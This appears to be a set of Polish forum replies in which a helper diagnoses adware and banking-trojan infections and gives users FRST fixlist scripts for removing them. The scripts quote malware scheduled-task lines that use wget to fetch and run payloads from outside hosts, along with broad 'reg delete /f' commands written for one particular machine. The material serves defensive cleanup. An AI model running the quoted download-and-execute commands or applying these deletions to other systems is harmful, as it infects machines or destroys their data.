"hxxp://binkiland.com/?f=7&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir=" ShortcutWithArgument: C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=sc&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 ShortcutWithArgument: C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=sc&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 ShortcutWithArgument: C:\Users\Marcin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=sc&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=hp&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://binkiland.com/?f=1&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie URLSearchHook: HKLM-x32 - (No Name) - {dd02a4eb-4afd-4d60-99d8-e67f964ca813} - No File SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM-x32 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2086743 SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> DefaultScope {1FEBBADB-6598-4F3A-AD0D-9853FC5F7F9D} URL = http://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> 01541664AF5149FF9B4D94F43912017D URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=616163&p={searchTerms} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=616163&p={searchTerms} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {1C28216C-7919-4B10-A179-75FB0726B269} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYPL&apn_uid=D24CE55F-883C-4AE5-8182-D84E11877E8E&apn_sauid=927F4496-103D-4301-9108-20F985683160 SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {1FEBBADB-6598-4F3A-AD0D-9853FC5F7F9D} URL = http://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.delta-homes.com/web/?utm_source=b&utm_medium=newgdp&utm_campaign=eXQ&utm_content=ds&from=newgdp&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1380327043&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2086743 SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {B224AA02-F7C8-3A2B-859F-560B80767E4A} URL = http://kl.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=PL&install_date=20130215&user_guid=2606DD330AB34104B30E522DE6924709&machine_id=f63707c914f863bac8be7c90d9c224e3&browser=IE&os=win&os_version=6.1-x64-SP1&iesrc={referrer:source} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {C9D00D2D-A4FC-4B2E-93AE-F4567EDAB646} URL = http://search.softonic.com/MON00085/tb_v1?q={searchTerms}&SearchSource=4&cc= BHO-x32: Dealio Toolbar -> {01398B87-61AF-4FFB-9AB5-1A1C5FB39A9C} -> C:\Program Files (x86)\Dealio Toolbar\IE\10.0\dealioToolbarIE.dll [2014-10-21] (Spigot, Inc.) Toolbar: HKLM - Dealio Toolbar - {01398B87-61AF-4FFB-9AB5-1A1C5FB39A9C} - C:\Program Files (x86)\Dealio Toolbar\IE\10.0\dealioToolbarIE64.dll [2014-10-21] (Spigot, Inc.) Toolbar: HKLM-x32 - No Name - {5911488E-9D1E-40ec-8CBB-06B231CC153F} - No File Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File Toolbar: HKLM-x32 - Dealio Toolbar - {01398B87-61AF-4FFB-9AB5-1A1C5FB39A9C} - C:\Program Files (x86)\Dealio Toolbar\IE\10.0\dealioToolbarIE.dll [2014-10-21] (Spigot, Inc.) Toolbar: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File Toolbar: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - No File StartMenuInternet: IEXPLORE.EXE - iexplore.exe StartMenuInternet: Google Chrome - chrome.exe C:\Program Files (x86)\Dealio Toolbar C:\Program Files (x86)\File Type Advisor C:\Program Files (x86)\StartNow Toolbar C:\Program Files (x86)\WSE_Binkiland C:\ProgramData\{465BAE98-16D9-7F1E-A75F-0F9C77DDDC12} C:\ProgramData\Microsoft\Windows\Start Menu\LG PC Suite.Lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\File Type Advisor C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyFree Codec C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NUMARK C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VUGames C:\ProgramData\Temp C:\ProgramData\TuneUp Software C:\Users\Groszek\Desktop\SWAT 4.lnk C:\Users\Marcin\AppData\Local\dt.dat C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\newtab.crx C:\Users\Marcin\AppData\Roaming\LiveSupport.exe_log.txt C:\Users\Marcin\AppData\Roaming\regsvr32.exe_log.txt C:\Users\Marcin\AppData\Roaming\ACEStream C:\Users\Marcin\AppData\Roaming\FileAdvisor C:\Users\Marcin\AppData\Roaming\Opera Software C:\Users\Marcin\AppData\Roaming\SkypEmoticons C:\Users\Marcin\AppData\Roaming\Wse_binkiland C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ace Stream Media C:\Users\Marcin\Desktop\pulpit\pisma\iTunes.lnk C:\Windows\msdownld.tmp C:\Windows\System32\drivers\wStLib64.sys Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome\Extensions /f Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj AVG Nation Toolbar, AS Magic Player, Magic Player (o ile nadal będą widoczne po w/w deinstalacjach). Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia zostaną wyłączone (aktywuj ponownie). Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. W systemie są dwa konta, z każdego wymagane raporty: ==================== Accounts: ============================= Groszek (S-1-5-21-3726203623-1480336290-1624226094-1003 - Limited - Enabled) => C:\Users\Groszek Marcin (S-1-5-21-3726203623-1480336290-1624226094-1000 - Administrator - Enabled) => C:\Users\Marcin Po kolei zaloguj się na każde poprzez pełny restart systemu, a nie opcje Wyloguj czy Przełącz użytkownika. Na każdym zrób nowy log FRST z opcji Scan, zaznacz pole Addition, by powstały dwa raporty. na koncie limitowanym Groszek uruchom FRST poprzez dwuklik a nie "Uruchom jako Administrator" (zmieni kontekst konta na Marcina). Dołącz też plik fixlog.txt.

Wszystko wykonane, ale jeszcze drobne poprawki: 1. W Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń podwójne wystąpienie adresu adware default-search.net, przestaw na "Otwórz stronę nowej karty". 2. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-251673657-1254408106-2500988348-1000\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Mozilla Maintenance Service CMD: del /q C:\Users\qvvas\Downloads\e943er98.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Wielkość liternictwa nie ma znaczenia w skryptach FRST. Ważne, by po przeklejeniu do Notatnika nie pojawiły się jakieś dodatkowe spacje. Po przeklejeniu skontroluj te słowa, które zostały zmanipulowane, i tam gdzie na stronie widać zielony znaczek w Notatniku nie ma być spacji. Skorzystaj z tej wersji FRST, którą posiadasz.

Czyszczę temat z dopisków. Tak, miałam kłopoty ze zdrowiem. Wracając do meritum, widzę malware SkypeFall: KLIK. Ponadto, jest mnóstwo zainstalowanych obiektów adware czynnie produkujących reklamy i przekierowania, na dodatek przeglądarka Google Chome została przez adware przekonwertowana z wersji stabilnej do developerskiej i wymagana reinstalacja przeglądarki. Przekierowania mystartsearch.com to wina zmodyfikowanych skrótów LNK przeglądarek, ale to tylko jeden z wielu problemów adware. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj poszkodowane Google Chrome oraz adware/malware BorderlineMaker, CYF version 1.0, RelaySys, Roll Around, SkypeFall version 1.0, SkypEmoticons, WorldWideWebCoupon. Przy deinstalacji Chrome zaznacz Usuń także dane przeglądarki, resztę doczyści punkt 2. Dodatkowo, są też pozycje Video Rotator V1.0.9, WinISD beta, które mają multum pustych skrótów, więc tego też się pozbądź. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 63816b85; c:\Program Files (x86)\BorderlineMaker\BorderlineMaker.dll [1951232 2015-03-06] () [File not signed] R2 bce312cc; c:\Program Files (x86)\RelaySys\RelaySys.dll [1967104 2015-03-03] () [File not signed] R2 ec9c17f1; c:\Program Files (x86)\SoftwarePlus\SoftwarePlus.dll [1685504 2015-02-26] () [File not signed] R2 Service Mgr RollAround; C:\ProgramData\2a617352-d396-46a3-a71b-5d89535356cf\plugincontainer.exe [581360 2015-03-06] () R2 Update Mgr RollAround; C:\Program Files (x86)\Common Files\2a617352-d396-46a3-a71b-5d89535356cf\updater.exe [388848 2015-03-06] () S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X] Task: {F0C4F8BA-4B3C-4729-9996-711832756949} - System32\Tasks\Ad-Aware Update (Weekly) => C:\Program Files (x86)\Lavasoft\Ad-Aware\Ad-AwareAdmin.exe HKU\S-1-5-21-945938231-2787147350-3338407632-1000\...\Run: [DAEMON Tools Lite] => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun HKU\S-1-5-21-945938231-2787147350-3338407632-1000\...\MountPoints2: {472f6686-5eac-11e4-b368-5404a6b0d4c8} - H:\setup.exe GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> D:\programy\firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 ShortcutWithArgument: C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> D:\programy\firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1419644287&from=wpc&uid=GOODRAMXC40_D6EB07461A7500586642 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=GOODRAMXC40_D6EB07461A7500586642&ts=1423219131&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=GOODRAMXC40_D6EB07461A7500586642&ts=1423219131&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-945938231-2787147350-3338407632-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.key-find.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=GOODRAMXC40_D6EB07461A7500586642&ts=1423219131&type=default&q={searchTerms} StartMenuInternet: IEXPLORE.EXE - iexplore.exe C:\Program Files (x86)\BorderlineMaker C:\Program Files (x86)\Google C:\Program Files (x86)\PrinceCiouPone C:\Program Files (x86)\RelaySys C:\Program Files (x86)\SoftwarePlus C:\Program Files (x86)\Common Files\2a617352-d396-46a3-a71b-5d89535356cf C:\ProgramData\2a617352-d396-46a3-a71b-5d89535356cf C:\ProgramData\3164dfc000001c67 C:\ProgramData\7564552405782015561 C:\ProgramData\aea8cc93-2213-47cf-a265-0391e3461dbb C:\ProgramData\kijgeebfcmjjkffjllnbechheibhhbke C:\ProgramData\MailUpdate C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Advanced Warfare C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SkypEmoticons C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoRotator C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinISD beta C:\Users\mateusz\AppData\Local\69ff07055291669bb2b218.72821112 C:\Users\mateusz\AppData\Local\Google C:\Users\mateusz\AppData\Local\icsxml C:\Users\mateusz\AppData\Local\Opera Software C:\Users\mateusz\AppData\Roaming\CYF C:\Users\mateusz\AppData\Roaming\GoldenGate C:\Users\mateusz\AppData\Roaming\MailUpdate C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\San Andreas Multiplayer.lnk C:\Users\mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Video Rotator.lnk C:\Users\mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\mateusz\AppData\Roaming\OpenCandy C:\Users\mateusz\AppData\Roaming\Opera Software C:\Users\mateusz\AppData\Roaming\Origin\update.vbe C:\Users\mateusz\AppData\Roaming\SkypeFall C:\Users\mateusz\AppData\Roaming\SkypEmoticons C:\Users\mateusz\Links\8 Ball Pool V10.lnk Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pola Addition + Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy wszystkie problemy ustąpiły.

Są tu dwa konta: ==================== Accounts: ============================= Kacper (S-1-5-21-2016024110-2163132575-2678418593-1001 - Administrator - Enabled) => C:\Users\Kacper Kacper_2 (S-1-5-21-2016024110-2163132575-2678418593-1005 - Administrator - Enabled) => C:\Users\Kacper_2 Dostarczyłeś raporty z konta Kacper. Logi FRST muszą być robione z każdego z kont z osobna, więc należy dostarczyć jeszcze zestaw będąc zalogowanym na Kacper_2 (logowanie poprzez pełny restart a nie opcje Wyloguj czy Przełącz użytkownika). Sprecyzuj też na którym koncie występuje problem reklam, czy może na obu. Wstępnie zaznaczę: w raportach na koncie Kacper nie widać żadnych oznak czynnego adware "Roll Around", a jeśli problem tyczy przeglądarki Google Chrome na tym koncie, to prawdopodobnie jest zainfekowany któryś globalny plik przeglądarki i trzeba będzie wykonać reinstalację browsera. Na razie dostarcz dane o które powyżej proszę.

W systemie jest wariant infekcji VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań. AdwCleaner nie nadaje się do usuwania takich infekcji. Dodatkowy problem to skutki pobytu innych infekcji typu adware - cała przeglądarka Google Chrome została przekonwertowana z wersji stabilnej do developerskiej i wymagana kompleksowa reinstalacja od zera. Działania do przeprowadzenia: 1. Odinstaluj zdefektowaną przeglądarkę Google Chrome, adware Image Downloader Plus oraz zbędny AVG Web TuneUp. Przed deinstalacją Chrome możesz wyeksportować zakładki, przy deinstalacji zaznacz Usuń także dane przeglądarki. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {024D2B1F-E3FD-4480-A24E-A137F47187DF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=rNeUiHGSrv;avg_isct_x64_all_2014_4745a8017.exe;1419765027 & start cmd /R dat.bmp Task: {18847BFA-6E53-449A-A62C-58BFC76EC40D} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=GlMhYSqEF4;up;1421863986 & start cmd /R dat.bmp Task: {AD6EFD0C-E8F6-4A25-9CBA-39EB81A1FEA9} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=u58NcYSj5B;up;1421863975 & start cmd /R dat.bmp HKU\S-1-5-21-1495383292-872571241-3386128745-1000\...\MountPoints2: {513c06f0-9262-11e4-a59d-002622ebb618} - G:\SETUP.EXE /AUTORUN CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKU\S-1-5-21-1495383292-872571241-3386128745-1000\Software\Microsoft\Internet Explorer\Main,Start Page = https://mysearch.avg.com/?cid={ED457F59-AAD2-4CF4-9536-EB952E6D8149}&mid=ed7145c1808247cdac51d16f640f5feb-3b249e40b8f31b7c2c567e14da7d3949258460bb&lang=pl&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-12-30 11:15:17&v=4.1.0.411&pid=wtu&sg=&sap=hp U4 Avgfwfd; system32\DRIVERS\avgfwd6a.sys [X] S2 vToolbarUpdater18.4.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.4.0\ToolbarUpdater.exe [X] C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\Windows\msdownld.tmp RemoveDirectory: C:\Users\TEMP Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym 